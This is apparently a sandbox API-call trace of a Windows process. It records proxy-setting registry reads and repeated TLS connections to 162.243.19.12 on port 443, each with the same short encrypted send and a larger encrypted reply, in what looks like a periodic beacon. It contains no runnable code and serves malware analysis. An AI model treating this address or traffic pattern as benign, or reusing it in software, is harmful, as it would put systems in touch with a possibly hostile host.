	[0396.844] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0396.844] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0396.844] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0396.844] GetCurrentProcess () returned 0xffffffffffffffff
	[0396.844] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa80) returned 1
	[0396.845] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc688a80
	[0396.845] WinHttpSetTimeouts (hInternet=0x233fc688a80, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0396.845] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0396.860] SetEvent (hEvent=0x6b4) returned 1
	[0396.861] select (in: nfds=0, readfds=0x233e4877a18, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4877a18, writefds=0x0, exceptfds=0x0) returned 1
	[0396.861] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0396.862] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0396.864] shutdown (s=0x7cc, how=2) returned 0
	[0396.865] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0396.865] closesocket (s=0x7cc) returned 0
	[0396.866] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0396.866] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa70
	[0396.867] WSAConnect (in: s=0x7cc, name=0x233e48791b0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0396.983] closesocket (s=0xa70) returned 0
	[0396.984] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4876158, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4879a38, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4879a38, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0396.985] FreeContextBuffer (in: pvContextBuffer=0x233fc687cf0 | out: pvContextBuffer=0x233fc687cf0) returned 0x0
	[0396.985] send (in: s=0x7cc, buf=0x233e4879b08*, len=333, flags=0 | out: buf=0x233e4879b08*) returned 333
	[0396.985] recv (in: s=0x7cc, buf=0x233e4879b08, len=5, flags=0 | out: buf=0x233e4879b08*) returned 5
	[0397.091] recv (in: s=0x7cc, buf=0x233e4879b0d, len=49, flags=0 | out: buf=0x233e4879b0d*) returned 49
	[0397.091] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4876158, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4879d48, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4879d68, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4879d68, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0397.091] recv (in: s=0x7cc, buf=0x233e4879e58, len=5, flags=0 | out: buf=0x233e4879e58*) returned 5
	[0397.091] recv (in: s=0x7cc, buf=0x233e4879e7d, len=1, flags=0 | out: buf=0x233e4879e7d*) returned 1
	[0397.091] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4876158, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4879f50, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4879f70, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4879f70, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0397.092] recv (in: s=0x7cc, buf=0x233e487a060, len=5, flags=0 | out: buf=0x233e487a060*) returned 5
	[0397.092] recv (in: s=0x7cc, buf=0x233e487a085, len=48, flags=0 | out: buf=0x233e487a085*) returned 48
	[0397.092] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4876158, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e487a188, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e487a1a8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e487a1a8, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0397.094] FreeContextBuffer (in: pvContextBuffer=0x233e399c580 | out: pvContextBuffer=0x233e399c580) returned 0x0
	[0397.094] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e487a2f0 | out: pBuffer=0x233e487a2f0) returned 0x0
	[0397.094] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e487a348 | out: pBuffer=0x233e487a348) returned 0x0
	[0397.095] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e487a3b0 | out: pBuffer=0x233e487a3b0) returned 0x0
	[0397.095] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0397.096] CertDuplicateStore (hCertStore=0x233fc681e30) returned 0x233fc681e30
	[0397.096] CertEnumCertificatesInStore (hCertStore=0x233fc681e30, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0397.096] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0397.096] CertEnumCertificatesInStore (hCertStore=0x233fc681e30, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0397.096] CertCloseStore (hCertStore=0x233fc681e30, dwFlags=0x0) returned 1
	[0397.097] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0397.098] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc681af0
	[0397.098] CertAddCRLLinkToStore (in: hCertStore=0x233fc681af0, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0397.098] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc681af0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0397.099] CertDuplicateCertificateChain (pChainContext=0x233fc6fef90) returned 0x233fc6fef90
	[0397.101] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0397.102] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0397.102] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0397.103] CertFreeCertificateChain (pChainContext=0x233fc6fef90) 
	[0397.103] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fef90, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0397.103] SetLastError (dwErrCode=0x0) 
	[0397.103] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fef90, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0397.104] CertFreeCertificateChain (pChainContext=0x233fc6fef90) 
	[0397.104] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0397.105] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e487cfb8, MessageSeqNo=0x0 | out: pMessage=0x233e487cfb8) returned 0x0
	[0397.105] CoTaskMemAlloc (cb=0x20) returned 0x233fc650170
	[0397.105] WSASend (in: s=0x7cc, lpBuffers=0x233fc650170*=((len=0x3b, buf=0x233e487a278*), (len=0xd5, buf=0x233e487cdc0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc650170*=((len=0x3b, buf=0x233e487a278*), (len=0xd5, buf=0x233e487cdc0*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0397.106] CoTaskMemFree (pv=0x233fc650170) 
	[0397.106] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0397.106] recv (in: s=0x7cc, buf=0x233e487d160, len=5, flags=0 | out: buf=0x233e487d160*) returned 5
	[0397.570] recv (in: s=0x7cc, buf=0x233e487d185, len=1488, flags=0 | out: buf=0x233e487d185*) returned 1488
	[0397.571] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e487d868, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e487d868, pfQOP=0x0) returned 0x0
	[0397.571] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0397.571] SetEvent (hEvent=0x6b4) returned 1
	[0397.594] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0403.596] CloseHandle (hObject=0x25c) returned 1
	[0403.750] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0403.751] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xe4) returned 0x0
	[0403.751] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0403.751] RegNotifyChangeKeyValue (hKey=0xe4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0403.752] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x394) returned 0x0
	[0403.752] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0403.752] RegNotifyChangeKeyValue (hKey=0x394, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0403.753] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0403.753] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0403.753] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0403.754] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa80) returned 1
	[0403.754] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68aea0
	[0403.754] WinHttpSetTimeouts (hInternet=0x233fc68aea0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0403.754] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0403.767] SetEvent (hEvent=0x6b4) returned 1
	[0403.767] select (in: nfds=0, readfds=0x233e4885260, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4885260, writefds=0x0, exceptfds=0x0) returned 1
	[0403.768] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0403.769] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0403.769] shutdown (s=0x7cc, how=2) returned 0
	[0403.774] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0403.774] closesocket (s=0x7cc) returned 0
	[0403.777] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0403.778] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa70
	[0403.778] WSAConnect (in: s=0x7cc, name=0x233e48869f8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0403.885] closesocket (s=0xa70) returned 0
	[0403.885] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48839a0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4887280, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4887280, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0403.886] FreeContextBuffer (in: pvContextBuffer=0x233fc687fd0 | out: pvContextBuffer=0x233fc687fd0) returned 0x0
	[0403.887] send (in: s=0x7cc, buf=0x233e4887350*, len=333, flags=0 | out: buf=0x233e4887350*) returned 333
	[0403.887] recv (in: s=0x7cc, buf=0x233e4887350, len=5, flags=0 | out: buf=0x233e4887350*) returned 5
	[0403.992] recv (in: s=0x7cc, buf=0x233e4887355, len=49, flags=0 | out: buf=0x233e4887355*) returned 49
	[0403.994] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48839a0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4887590, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e48875b0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e48875b0, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0403.995] recv (in: s=0x7cc, buf=0x233e48876a0, len=5, flags=0 | out: buf=0x233e48876a0*) returned 5
	[0403.995] recv (in: s=0x7cc, buf=0x233e48876c5, len=1, flags=0 | out: buf=0x233e48876c5*) returned 1
	[0403.995] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48839a0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4887798, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e48877b8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e48877b8, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0403.996] recv (in: s=0x7cc, buf=0x233e48878a8, len=5, flags=0 | out: buf=0x233e48878a8*) returned 5
	[0403.996] recv (in: s=0x7cc, buf=0x233e48878cd, len=48, flags=0 | out: buf=0x233e48878cd*) returned 48
	[0403.996] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48839a0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48879d0, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e48879f0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e48879f0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0403.998] FreeContextBuffer (in: pvContextBuffer=0x233e399cb80 | out: pvContextBuffer=0x233e399cb80) returned 0x0
	[0403.998] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4887b38 | out: pBuffer=0x233e4887b38) returned 0x0
	[0403.998] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4887b90 | out: pBuffer=0x233e4887b90) returned 0x0
	[0403.998] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4887bf8 | out: pBuffer=0x233e4887bf8) returned 0x0
	[0404.000] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0404.000] CertDuplicateStore (hCertStore=0x233fc682cd0) returned 0x233fc682cd0
	[0404.001] CertEnumCertificatesInStore (hCertStore=0x233fc682cd0, pPrevCertContext=0x0) returned 0x233fc67feb0
	[0404.001] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0404.001] CertEnumCertificatesInStore (hCertStore=0x233fc682cd0, pPrevCertContext=0x233fc67feb0) returned 0x0
	[0404.002] CertCloseStore (hCertStore=0x233fc682cd0, dwFlags=0x0) returned 1
	[0404.002] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0404.020] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc6831b0
	[0404.020] CertAddCRLLinkToStore (in: hCertStore=0x233fc6831b0, pCrlContext=0x233fc67feb0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0404.020] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67feb0, pTime=0x350199b4c8, hAdditionalStore=0x233fc6831b0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0404.021] CertDuplicateCertificateChain (pChainContext=0x233fc6feb10) returned 0x233fc6feb10
	[0404.022] CertDuplicateCertificateContext (pCertContext=0x233fc67feb0) returned 0x233fc67feb0
	[0404.023] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0404.024] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0404.024] CertFreeCertificateChain (pChainContext=0x233fc6feb10) 
	[0404.024] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6feb10, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0404.024] SetLastError (dwErrCode=0x0) 
	[0404.024] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6feb10, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0404.025] CertFreeCertificateChain (pChainContext=0x233fc6feb10) 
	[0404.026] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0404.026] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e488a800, MessageSeqNo=0x0 | out: pMessage=0x233e488a800) returned 0x0
	[0404.027] CoTaskMemAlloc (cb=0x20) returned 0x233fc650170
	[0404.027] WSASend (in: s=0x7cc, lpBuffers=0x233fc650170*=((len=0x3b, buf=0x233e4887ac0*), (len=0xd5, buf=0x233e488a608*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc650170*=((len=0x3b, buf=0x233e4887ac0*), (len=0xd5, buf=0x233e488a608*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0404.027] CoTaskMemFree (pv=0x233fc650170) 
	[0404.027] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0404.028] recv (in: s=0x7cc, buf=0x233e488a9a8, len=5, flags=0 | out: buf=0x233e488a9a8*) returned 5
	[0404.483] recv (in: s=0x7cc, buf=0x233e488a9cd, len=1488, flags=0 | out: buf=0x233e488a9cd*) returned 1488
	[0404.483] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e488b0b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e488b0b0, pfQOP=0x0) returned 0x0
	[0404.486] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0404.486] SetEvent (hEvent=0x6b4) returned 1
	[0404.515] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0419.516] CloseHandle (hObject=0x25c) returned 1
	[0419.603] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0419.603] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x270) returned 0x0
	[0419.604] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0419.604] RegNotifyChangeKeyValue (hKey=0x270, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x394, fAsynchronous=1) returned 0x0
	[0419.604] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x164) returned 0x0
	[0419.604] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0419.604] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0419.605] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x3c4) returned 0x0
	[0419.605] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa80
	[0419.605] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa80, fAsynchronous=1) returned 0x0
	[0419.606] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa5c) returned 1
	[0419.606] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68b720
	[0419.606] WinHttpSetTimeouts (hInternet=0x233fc68b720, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0419.606] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0419.618] SetEvent (hEvent=0x6b4) returned 1
	[0419.618] select (in: nfds=0, readfds=0x233e4892a78, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e4892a78, writefds=0x0, exceptfds=0x0) returned 1
	[0419.618] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0419.619] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0419.620] shutdown (s=0x7cc, how=2) returned 0
	[0419.622] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0419.622] closesocket (s=0x7cc) returned 0
	[0419.623] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0419.624] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa58
	[0419.624] WSAConnect (in: s=0x7cc, name=0x233e4894240*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0419.736] closesocket (s=0xa58) returned 0
	[0419.737] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e48911e8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e4894ac8, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e4894ac8, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0419.738] FreeContextBuffer (in: pvContextBuffer=0x233fc686bb0 | out: pvContextBuffer=0x233fc686bb0) returned 0x0
	[0419.738] send (in: s=0x7cc, buf=0x233e4894b98*, len=333, flags=0 | out: buf=0x233e4894b98*) returned 333
	[0419.739] recv (in: s=0x7cc, buf=0x233e4894b98, len=5, flags=0 | out: buf=0x233e4894b98*) returned 5
	[0419.844] recv (in: s=0x7cc, buf=0x233e4894b9d, len=49, flags=0 | out: buf=0x233e4894b9d*) returned 49
	[0419.845] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e48911e8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4894dd8, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4894df8, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4894df8, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0419.845] recv (in: s=0x7cc, buf=0x233e4894ee8, len=5, flags=0 | out: buf=0x233e4894ee8*) returned 5
	[0419.845] recv (in: s=0x7cc, buf=0x233e4894f0d, len=1, flags=0 | out: buf=0x233e4894f0d*) returned 1
	[0419.845] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e48911e8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4894fe0, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4895000, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4895000, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0419.846] recv (in: s=0x7cc, buf=0x233e48950f0, len=5, flags=0 | out: buf=0x233e48950f0*) returned 5
	[0419.846] recv (in: s=0x7cc, buf=0x233e4895115, len=48, flags=0 | out: buf=0x233e4895115*) returned 48
	[0419.846] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e48911e8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4895218, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4895238, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4895238, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0419.847] FreeContextBuffer (in: pvContextBuffer=0x233e399b800 | out: pvContextBuffer=0x233e399b800) returned 0x0
	[0419.847] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4895380 | out: pBuffer=0x233e4895380) returned 0x0
	[0419.847] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e48953d8 | out: pBuffer=0x233e48953d8) returned 0x0
	[0419.848] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4895440 | out: pBuffer=0x233e4895440) returned 0x0
	[0419.848] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0419.849] CertDuplicateStore (hCertStore=0x233fc682720) returned 0x233fc682720
	[0419.849] CertEnumCertificatesInStore (hCertStore=0x233fc682720, pPrevCertContext=0x0) returned 0x233fc67f430
	[0419.849] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0419.849] CertEnumCertificatesInStore (hCertStore=0x233fc682720, pPrevCertContext=0x233fc67f430) returned 0x0
	[0419.849] CertCloseStore (hCertStore=0x233fc682720, dwFlags=0x0) returned 1
